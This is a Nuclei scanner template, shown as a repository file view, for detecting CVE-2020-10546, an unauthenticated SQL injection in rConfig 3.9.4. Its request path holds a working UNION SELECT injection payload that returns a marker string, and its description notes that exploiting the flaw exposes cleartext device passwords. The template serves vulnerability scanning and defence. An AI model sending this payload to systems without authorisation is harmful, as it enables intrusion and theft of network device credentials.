nuclei-templates/cves/2020/CVE-2020-10546.yaml

25 lines
1019 B
YAML
Raw Normal View History

2021-02-14 19:30:22 +00:00
id: CVE-2020-10546
info:
name: rConfig 3.9.4 SQLi
author: madrobot
severity: high
2021-03-24 06:54:09 +00:00
description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicies.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
reference:
2021-03-24 06:54:09 +00:00
- https://github.com/theguly/exploits/blob/master/CVE-2020-10546.py
- https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
2021-02-15 19:05:52 +00:00
tags: cve,cve2020,rconfig,sqli
2021-02-14 19:30:22 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[project-discovery]"
part: body